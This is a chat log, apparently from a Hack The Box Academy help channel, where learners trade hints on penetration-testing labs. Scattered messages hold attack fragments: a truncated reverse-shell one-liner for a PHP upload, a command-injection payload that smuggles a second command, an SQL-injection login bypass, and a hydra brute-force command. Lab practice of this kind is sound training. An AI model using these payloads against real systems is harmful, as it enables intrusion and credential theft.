id_rsa needs right perms or else ssh wont accept it

madfox. i've seen you hlep a lot of ppl here. could you help me? im stuck and have no idea what im doin wrong...also the nslookup that is shown in the module to be used doesn't work

you added it to the host file, are you also @rustic sageip for you commands?

Thank you, I got it!

i added to the host file

yeah but for you nslookup are you @ it as well to select it as the name server to use

i just used this so i can give a proper error msg: nslookup -type=any -query=AXFR inlanefreight.htb @10.129.42.195(how do i add it as spoiler if needed???) and i get this errro msg: nslookup: couldn't get address for '@10.129.42.195': not found

try @ the domain instead of the ip

I also generally use dig for my domain lookups instead of nslookup so not super familiar with their syntax

doesn't work. i'll check dig

hello everyone, is anyone experienced with reverse engineering? if so i can further explain the problem and my approach so far. Thanks.

what is bobs password on service scanning on getting started

Hi so Im currently on the HTB Academy Getting-Started module in section Nibbles - Initial Foothold, and it seems that I can't use the admin dashboard plugin my_image to upload the payload.php ... each time I try to save changes, the process stalls at the action of saving changes but does nothing. I've also tested this with another instance of the machine, which produces the same results. Any ideas? Also is this the right channel for this?

Did you read carefully the module? Answer is there 🙂

Hi, this is correct one, what format is your file? Can you share the screenshot of the error? Also, did you follow step by step doing the module?

Can someone help me get David's credentials so I can access Backup.vdh and complete password attacks - hard lab

@stiff stream Currently there is no error (the page seems to load indefinitely), and the format I used was a simple copy and paste of the ||"rm /tmpf;/mkfifo....."|| inside the payload.php file with the correct attacker ip and port for ||nc listener||

everything else works fine and loads right up
Edit: The indefinite reload resorted to a connection reset page from the plugins my_image save changes page.

For the footprinting hard lab, can someone give me a hint/nudge once in the machine on how to connect to mysql since the user used to ssh is not allowed to? thank you
EDIT: figured it out, lmao

Can you check|| netcat listener||, if the page seems to be loading it might be that it's trying to connect to your netcat shell? Another option would be to|| curl ||the page

what should I do if my ssh connection times out after copying the root id_rsa to my machine?

try again, exfil a diff method

I verified and no output, neither is the file showing up on the ||/content/private/plugins/my_image/|| dir.

I'll try to see if I can make it to work, you can dm me!

Hi there, I am looking for some assistance in the [Attacking Web Application with Ffuf] Module, Parameter Fuzzing .
So I have added both academy.htb and admin.academy.htb to etc/hosts, im using the correct list, the is path admin/admin.php?FUZZ=key. but still, i get back just user which seems to be a deprecated method. Any hints what do i miss?

Hello 🙋question in Web Server Pivoting with Rpivot section it saying
Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the..

I have done everything but no Flage showing in the webpage

@gloomy tangle read the source code to get the right uploads folder

@stiff needle if you have 2 usernames in the format username.countrycode you should get the rest. The next part is to bf those creds with the right password policy from rockyou.txt search here in the channel i shared a password policy checker that i did to filter out the passwords for you

has anyone done the Service Authentication Brute Forcing module here ?

i crafted a password list for Bill Gates but password is not in there

@green girder nibbles can be pwned using metasploit. 😉

Ohh ok thanks for that, but it is supposed to work the ||upload payload.php to my_image plugin|| right?

Hi I’m working on the nibble privilege escalation box in the getting started module. I have done everything correct and have root but can not for the life of me find root.txt. Any suggestions?

find / -name root.txt right?

Hey guys. I am having issues with the Archetype box in Starting Point. The nc64.exe will not get deployed to the mssqlclient that I am in. Is there anyone else that can help?

I receive a message saying the file does not exist. In the module lesson it says to look for such a file though

Dm

found, the answer, DM me if you want to know

Can someone give me an hint for Firewall and IDS/IPS Evasion - Medium Lab ?

DNS uses UDP

ok thank you

Brute forcing passwords module : skills assessment website - question 2

Can someone please explain to me what files to use for bruteforcing? I've tried a bunch and still no go and I'm starting to feel like things might be broken

this is what im trying to do but how can we retrieve the flag with enable_xp_cmdshell? also need admin privs? i got a reverse shell and tried a few exploits, such as the one suggested here but not working for me.. when using ||PrinterSpoofer|| to get a reverse shell, i get a connection but no command output was a problem with my instance, soon as it expired i repeated all the steps from notes and it worked first time 🙄

yes but metasploit do all of that for you, upload the rev shell, open the listener and stablish the connection

Yep, tested that too, idk why but no shell was given after the set info and run, it did login but immediately exited and had the message ||"image.php" would have to be manually cleaned up||, but when I checked in the ||/content/private/plugins/my_image/|| nothing showed

sadly i have no noteson any module i did so i can not give you the exact answers 😦

No worries. will have to keep trying!!

hello everyone i am new here i am looking to get some practice here in is there a beginner module here

@dusk beacon check any of the fundemental/tier 0 modules

we're in this together, I am doing the same module

thank you

I'll let you know if I figure it out, but I searched the chat here and it seems like a lot of people had the very same issue. Couldn't find any hints though

im trying both -L and -P options as well with -u, maybe we can try different things together

i wait 5 minutes per run

where are the modules?

I'm totally lost in "Information Gathering - Web Edition" WHOIS:

I have got the IANA ID Number correct. But I get lost on the question: What is the admin email contact for the venmo.com domain (also in-scope for the PayPal bug bounty program)

Ok so if a machine is not working as intended in the step by step academy module, who would I contact about it?

I tried multiple username files and multiple password lists, but no go so far

same here, wondering if we should really try all those combinations

maybe username is just admin

tried with all -C possibilities, so we can exclude that

I'm using FFUF now because Hydra sucks

can anyone help me, please?

Anyone else having issues sshing into remote targets atm?

I'm trying to remote to this workstation part of the shells and payloads where it just wants you to initially remote to the distant end then set up nc and practice setting up a shell but its getting stuck

when I run ssh with -v im seeing its waiting for a reply from the server

is the the htb vm bugged ?

I'm having trouble opening a web page of a target machine

It's super slow and doesn't load the css

So i guess htb is "bugged"

Should be able to find it using the same command that you got the IANA number

Probably the server is overloaded or in maintenance

Thats what im thinking I can't ssh to this remote machine at all and its part of the instructions to start the question

I joined this server just to know if there is a problem with htb or i'm just dumb

I used WHOIS command for the IANA number. My guess is they want a Emailaddress but on Admin email it only point to a Email Request Form. Do you have anymore clue / hint ?

I'm going to try again tomorrow, have a nice day

itll be in the whois data, just read closer

|| I think they might of removed it actually looks like it directs you to an email form now where the answer used to be and if you use a online tool now its redacted 🤔 ||

I have a quick question about the footprinting - hard lab if anybody is around to help.

Shoot

I solved it! 🙂

Basically having a problem getting anything back from snmpwalk. the machine is running v3, so v1/2 obviously wont work when trying to scan.
As far as i can see, V3 requires credentials to use w/ snmpwalk?

Try a different tool listed on the page for snmp

methinks onesixtyone 😄

I've been stuck on firewall and IDS/IPS evasion - medium lab for a while. Is anyone able to assist?

Still nothing on my end! I have to say, this skills assessment takes the cake for worst yet in the bug bounty hunter path

It's not broken, just a little more involved 🙂 I used rockyou and got the creds

rockyou will not complete by the time the server resets, so not sure why they designed something that takes a day to run

That's only true if the credentials are literally in the last line of the text file

There's also the -t flag to run more parallel connections

strange, I just ran it again and this time it worked. I'm 100% sure I ran it a few times before, so not sure what changed, other than server reset

I am on the Password Attacks easy but having trouble as to what username list or password list we use?

Got it. Make sure you pay attention to what you read 🤪

Hmm I'm not too sure. Glad you got it 🙂

Can anyone help on shells & payloads module, php webshell section? I know what the answer is to the first question however it is not accepting my input. I believe it is a format error

check the resources for the module

finally got it, format error

hello everyone, I'm stuck in Predictable Reset Token under Broken Auth

anyone who can give me a hint

I'm having trouble while trying to access the machine using RDP on the Introduction to Active Directory Module. Is anybody facing the same issue?

is it possible for youtube to be hacked?

of course

I'm having an issue with question 6

hey guys, i need help i'm use kali linux but i download on my window 10 laptop but it don't work. i'm trying to use it for hack the box.

https://youtu.be/l97dVIKlmVg

@stiff stream yeah I re read and seen it lol

anyone happen to finish the Tunneling, Pivoting, and Port Forwarding assessment? Currently stuck on question 6. Have creds and all but I'm not seeing other machines in one of the subnets

Need some hint on Password Attacks-Mutations section. The password list after mutation is around 94k. Brute forcing is taking time. Is this the intended way?

make sure you use the "sed" command to clean up the list to match the requirements

i will check out that video but kali linuk don't work on my window 10 laptop

@coral onyx for windows 10, check on WSL, it is not as easy to setup a VM but you'll save plenty of resources, that is what i do

I figured out the assessment. Feel free to dm me if you're still stuck.

You might want to try attacking another service on the box.

@rustic sage youtube has been already hacked. The case i know, they used XXE over an AVI file upload and they did an LFI over the /etc/passwd on the youtube server. Luckily it was a white hat hacker. There shoul be a lot pf other bugs out there

hi everyone 🙂

thats really nifty 🙂

Hello everyone! I'm stuck at the "Network Enumeration with Nmap - Medium Lab", I know it's a pretty easy section but I tried many different options without success. The last command that i lounched included: port 53, decoys (RND:5), source port 53, UDP scan, script for grabbing the dns version, T 2 and other minor settings such as -Pn --disable-arp-ping

@west rampart hey i send in htb academy

@west rampart i have blocked my account

Define, "doesn't work."

Hello everyone!!! I’m new to the community and I am working on the Three machine in Task 4 but I’m not able to get the sub-domain like it shows in the walkthrough. I had use different sub-domain list and still not showing

hello everyone, I'm stuck in Predictable Reset Token under Broken Auth, anyone who can give a hint

Damm wanna do the secure JavaScript doding module

Expansieve module haha

hey. coudl someone help me with the active subdomain enumeration in the information gathering - web edition module?

im tryin to get the A records with dig but i doesn't work :S

I was trying to use sed but am having trouble do you have any resources?

Anyone who knows python?

Struggling with a flag.txt on the "Using the Metasploit Framework"

I have attempted to utilize multiple exploits, to gain root access, but have been unable to gain shell. I am specifically am struggling with figuring out what exploit I need to run and why that one specifically. Any one have a bit of time willing to assist my ignorance?

@lethal atlas Login Bruteforcing done 😉 https://academy.hackthebox.com/achievement/433014/57

@warm turret congrats

🥂

Hello, I am on the command injection module for bypassing blacklisting characters, the question reads:
Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?

I have attempted several different payloads which should be working
127.0.0.1%0a${IFS}ls%09${PATH:0:1}home

but I cannot even get ls by itself to execute. I am not sure why. I am definitely targeting the right url, just nothing besides the ping command is showing up.

@sleek brook try clear your password wordlist with this https://github.com/josemlwdf/PasswordPolicyChecker

@elder tapir use https://github.com/josemlwdf/1nj3ct0r

@elder tapir I couldn’t get PATH to work, try something different, I think I used COLOR

Why do I understand code better then the Dutch language?

I have a question about the SQLi module: given this query:
select * from users where username=admin OR '1'='1' AND password='password'

it says the AND goes before OR, so '1'='1' AND password='password' equals false, than it does the OR and because '1'='1' equals true, the OR is true.
So: Does the OR look only at username=admin or '1'='1', or does it compare username=admin or FALSE (because the AND condition equals to false)

because in that last case it doesn't really matter what you put in after the OR, even FALSE will work. But in the first case you need a TRUE statement after the OR

well, given the user admin does exist

@rustic sage actually you could say user=anything OR 'ANY_ID' = 'ANY_ID' -- - and it will show you the ANY_ID user. Usually the first admin created (id=1) is the admin and do not forget to use -- - to kill the SQL statement, otherwise it will still check for the password and you'll not achieve the SQLi

Just like Mary

It does some commando’s first

Just like math

I meant

• before +

If ya know what i mean

yeah I got that, but does it only compare the '1'='1' bit in the OR or the whole AND condition ('1'='1' AND password='password')

Look at the diagram

In one of the sectio’s

that's what was confusing me 🙂 the diagram shows it takes the whole ('1'='1' AND password='password'). But than it doesn't matter if you put '1'='1' or '1'='2'

the AND it is never evaluated because you comment it using -- -

thanks for replying, but unfortunately I have to go 😦 will check back later

Id hate to keep posting the same problem but I am not seeing an end on enumerating the username 'sam' on password attack

for me its not working man, I have sudo hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P rockyou.txt -f 134.122.104.208 -s 31397 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"

Sorry misunderstood u

could you help me? 😛

@everyone

what the mean @ everyone ?

Hello,
Assessment on File Inclusion module.
Have the admin panel. Can see etc/passwd.

Thats it.. i am stuck. Can i get some help please?

Use the username from the previous question

i dont believe in god but may god bless you

This is how I felt yesterday when it finally worked

Hlo everyone

How are you

I am new participant

Can anyone tell about this website

And how to work

I am right now at the STACK-BASED BUFFER OVERFLOWS ON LINUX X86 module. On the Take Control of EIP part I need to submit the address of the EBP as the answer, but does somebody know at wich point I need to take the EBP address?

Oh oh oh

Use some poison

Can someone help me with attacking common webapplications osticket

Got a ticket and used the email received at gitlab

And im stuck

Bought another 200 cubes

Hhahaha

Step 1 complete module

Step 2 summerize and blog about the topic

Steo 3 hack a sinilair box

Then it will stuck in the brain

@onyx rapids on the skills assessment - website, did the script using 'rockyou.txt' say it would take 386 hours to complete??

Any idea for #1031995405153611868 guys?

If you divide a /27 into subnets what would be the new cidr?

for each of them (considering all equal)

I posted a subnet calculator, but I believe where you need to look is going to be at what the cidr range will be

I think you would be looking for /29

Yes, but the password is really early on in the list, so it should take a minute or two at most. Make sure you're using the username from question 1

im using the same username. it's been bruteforcing for at least 20minutes

Can you show me your command?

Check your password parameter, I think it should be pass instead of password

okay, lemme give that a go

Reset the machine too just for the heck of it. hydra doesn't give any output when things don't work, so it's hard to know if something isn't working

that was it

thanks!

No problem!

For Attacking Common Services - DNS is there a particular wordlist to use for it? Ive found two subdomains besides ofc ns, but no flags on either of em and ive tried a couple different wordlists.

@thorn urchin have you tried scanning each subdomain you originally found? If not try scanning them. It's definitely a "fierce" task

Thats a different module

Im familiar with that fierce hint lol

@thorn urchin oh your talking about the one after that one lol.

@thorn urchin is it the web one?

not footprinting module, Attacking Common Services

though trying the suggestion anyways wouldnt hurt

@thorn urchin I would have to look through them again but if it is public server then you could always scan it using a web based subdomain scanner.

it isnt, thats what I did for one of the broken questions in a diff module lol

https://subdomainfinder.c99.nl/index.php I used this one for one of the questions lol

yup for the infamous triage question

but this one is all internal so that wont help

I'll take a look and see what I can come up with after I finish this other module.

the hint is pretty clear about what it wants you to use, but it doesnt find it

tells you to use subbrute, but the wordlist doesnt find anything I havnt already found. No extra records, no cname records that might leak other sources, no zone transfers on anything.

and yeah scanning for more subdomains on the ones I have found turned up nothing either

And you did add the servers to your /etc/hosts?

yes

no webservers running either

double checked that resources doesnt have a list for you to use either

look at ||the sample command output for "DIG - AXFR Zone Transfer" earlier in the section ...there is a clue ||

zone transfers were denied for everything

unless literally one of the results in the sample is meant to be used as a test point in the question in which case thats absolutely terrible module design.

This module was actually written by an AI so I tend not to question it. Once you get the answer I'll leave it up to you to decide 😉

nope didnt get me anything

DM me

ok

tfw jared evaporates to dust after DMing him

I am more like the girl from Alex Mac who turns into a puddle

https://tenor.com/view/kids-jumping-raining-muddy-puddles-gif-12354317

@simple dragon use the wordlists as they teach you in the sections, you'll find the answer in seconds. For the second password use rockyou10.txt as they suggest

Someone report @cyan ferry for SPAM plz

Nice

i made a namelist for harry with the username anarchy tool and then used cupp -i with only 'Harry' as the input. after that i shrank that cupp -i generated password list with the 'sed' commands in the sections. now im brute force ssh'ing. estimated wait time is 3hours

for why?

Yeah Im affirmed in my position that question is just a badly designed scenario question.

Biep

For the Password Attacks - Hard lab, what wordlist did you use to bruteforce the vhd

iirc rockyou

hi

Ty

Why didnt they call it duckyoy?

Biep

Hey, I was just reading through the messages in here and wanted you advice with the formatting for the easy lab? I found ftp and ssh with an nmap scan and have tried bruteforcing with the provided creds. Haven't had any luck though.

Could anybody assist with the Password Attacks - Easy Lab? I am trying to brute force logins using the provided credentials but I am not getting any hits. Any suggestions?

Feel free to DM me

Will do, thank you

Anyone else have trouble with Broken Authentication - Predictable Reset Token?
#modules message
I'm using this awesome Python script, and it still won't work!
I change the URL, and put the epoch in milliseconds, but no hits.

I get the epoch by taking the timestamp given on the website and placing it here https://www.epochconverter.com/
Tried the GMT and the Local option, but doesn't change a thing

So did the Attacking Common Services Easy lab and got the flag, but theres a hint about a second method of getting it. Anyone want to help enlighten me what the alt method is?

ftr my route was the ||outfile|| route

I suspect something involving ||rdp|| but Im not certain since I hit a dead wall there

hi

I think that I need to ask

I am having trouble with this one question and would like a hint

Determine what user the ProFTPd server is running under. Submit the username as the answer.

I have trouble with this.

nevermind I solved it

any one finish Password Attacks Lab - Hard? Im stuck but I found J's credentials though when I try to use them via xfreerdp keep getting errors. Get same errors in the pwn box too. Wanting to make sure im not experiencing some technical issue.

As a friendly suggestion I found this useful: https://startupsledger.gumroad.com/l/jtkvir

@loud patrol #SPAM

@onyx rapids it is a tricky question, you should check the timestamp of your own token, including the miliseconds (*1000) from there you increase miliseconds by 1 to bruteforce the qdmin token

@covert vault wich section?

@simple dragon try filling the entire name and lastname to generate the passwords wordlist.

And @simple dragon use the policy checker i shared. It is better and easier than the sed command. Almost the same results

I ended up getting it, now I’m stuck on the medium lab. I’ve gotten credentials through certain means but don’t know how to proceed for root

Feel free to DM me, if you're still stuck.

https://academy.hackthebox.com/module/details/143

hey guys i was just wondering if the Active Directory Enumeration and Attacks module includes things such as the golden/silver ticket attack. I know it probably does but want to make sure before i get the module.

So, I'm going through the javascript deobfuscation module as part of the getting started process, and it's asking me to go to a url shown, but the url is just http://SERVER_IP:PORT and is that normal? >.>

Just solved this ("Network Enumeration with Nmap - Medium Lab"), for others that might be in my situation: just use THEIR pwnbox, don't use your kali... In my opinion challenges must always have a solution that's independent from the attacking machine, to be obligated to use their parrot in order to solve this is a design fault. At least it should be specified in the task what to use

i'm back

and... window is installed on the wrong drive also all of my VMs is wiped so bye guy (for today)

also i got 15 dm anyone still need help ping me again

To be fair, one of the reasons it's probably that way is to help incentivize subbing. Otherwise you could just set up a VM and never really need to sub unless you want access to the retired boxes.

That being said, agreed that they could at least let you know if it has to be done with pwnbox instead of your own VM

Hi guys I am confused about SMB. I got a list cred, I used both hydra and smbexec to bruteforce loging. Hydra told me that server denied but smbexec can bruteforce. So what is the reason?

have you used the -vV option for hydra?

Actually scratch that, what's your hydra command?

(without spoilers please)

Hey guys I am new here 😅

I have some doubts as beginner for learning ethical hacking

try this if you are new https://www.youtube.com/watch?v=lhz0-qAQlBM also i recommend tryhackme to start

Yeah I had already seen it

But still have little doubt 🥲

your best bet is to try out different topics, and see what you like

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

this is a good first look at what you can do

also go over to Pico gym and try the PicoCTF challenges

they have writeups you can search for on github/ctftime

tryhackme have some free stuff beginner if are still doubting about putting money in then give that a try

Wait wait .... atleast listen my doubt😅😅

Starting point on HTB will teach a good methodology and introduce some nice concepts

oh yeah that too

hello

i need help

😅

and remember, the last 2 retired boxes are free on HTB and they have writeups, either from users or from HTB (ippsec does them in video format)

ah doubt if you should start in the domain?

My doubt is ......What should I know from a programming language...... should I learn every language in advance

you don't need to learn a language first

you will need to pick up bash and powershell, and probably python

i was solving the reponder box from htb but when i run the tool responder it doesn't capture the ntlms?
can anyone help?

try ask that in #boxes

I think responder is a #starting-point box though

oh

Dude okay I had already learnt python but still confused how to use ,where to use,

then that's fine

for hacking you just need to learn about the scripting path no need to learn how to build something

Ermmm😅.... what's the scripting path....what it mean

just making simple scripts.

Okay Yeah I can make😐

can be done in bash or pythjon or perl, or whatever

What else should I do ?? Now

the best thing is to start so you can get a feel for what you like hacking

Wait I want to tell u that

CTFs are challenges in bite sizes, so PicoCTF is a great starting block

How Can I find PicoCTF

Hacking boxes will go through exposed services or vulnerable websites to gaining full control of the server, so that might also be more your thing

https://play.picoctf.org/

Okay ...I see

wonder if HTB has ever thought about using regex 🤔😅

even trimming spaces from answers should be super easy 🙄

But I want to learn hacking the server sides

So is it enough to learn python

🙄🙄😬😬

yes

yeah on tryhackme answers with spaces are still accepted

try out our starting point for example, it has writeups. Or try out the last retired boxes and follow along ippsec's videos

it'll teach you some basics and most importantly the methodology

methodo is 80% of the work

Woo okay😐

Ippsec's videos can I find it in YouTube???

yeah so, hacking is mainly having a good methodology, and LOTS of trial and error

Yeah that's true😅

and reading docs, and learning.

What type of docs🙄

could be anything, from the language you're trying to exploit, such as in a C program that accepts user inputs, to an apache server

U mean I have to learn C too

docs often tell you what misconfigurations to avoid, which means if it's present you can exploit it

or a sillier example that unfortunately happens, docs list the default passwords and login for admin

you don't have to learn C

you have to learn to eventually exploit C's language features when a dev makes a mistake

but it's true of any language.

Okayy😐

a dev can make a logic error that let's you reset the admin password from your user account for example.

that could be in any language, but that's irrelevant to your exploit

Yeah yeah that's what I want to tell u😅😅

If I want to exploit something....then if that something is in other languages which is never i had learnt......that ....then what can I do on that case 🙄

that's when you use google and read the docs 😉

that's what we all did

and do

Okay😅

Ermmm can U share me some docs....that may help me out to know something 😅

you must learn to do your research for a lot of things, and for others well, you can only try and fail until you succeed (or not, sometimes it's not a vuln)

https://book.hacktricks.xyz/ this could help you.

Okayy tq dude😉

Hey bruhh....can U explain me more as a beginner 😅😅....I want to know something more

hello everyone, anyone who can let me know where I can find a wordlist for guessable answers..!!!

I'm looking for this kind of wordlist to try to solve the guessable answers exercise under Broken Auth module..!!!

thanks in advanced

oh you don't need a wordlist for that you can just guess it 🤣 you just need to find the right question

ok., for non English native speaker is not hard to find the right question?

i'm also not a English native speaker and the first time i do this i did have some trouble finding the right question

if you still have issue with that try to note down all of the question and try to guess each one to see with one is the most guessable and if you still need help with that shoot me a dm

I guys, why hydra fail but crackmapexec can bruteforce ?

Hashcat module Combination Attack question is not accepting the cleartext answer, anyone around?

Have you added streamio.htb to the Hosts file?
For hydra you enter a domain name, while CME you enter an IP.

also i can't remember which version but hydra will have some issue with some newer version of smb

does your cleartext answer start with an ||f|| ?

Yup

Hurt your teeth bitng the rest 😄

oh and i should mention this i did help one guy with this module (not this section) and even with the right answer htb still won't accepted and support can't help because they can't re-create the issue but the rest of the section is fine for him

So no cubes on this section 😦

so if you want me to double check dm me the password you found if that still doesn't help i think you should contact support

Yeah I'll DM just to be certain.

Cheers @vital adder weird bug fixed.

already done bro. But it's still the same

I did "apt-get update && apt-get upgrade", still got errors. Other machine, I can use hydra to brutforce but not for this machine

I mean the latest version of hydra will have some issue with some newer version of SMB if that the case updating your machine or hydra won't help

yaya that could be the problem. Thanks

I was having issues with 9.5-dev, however 9.4 is working fine .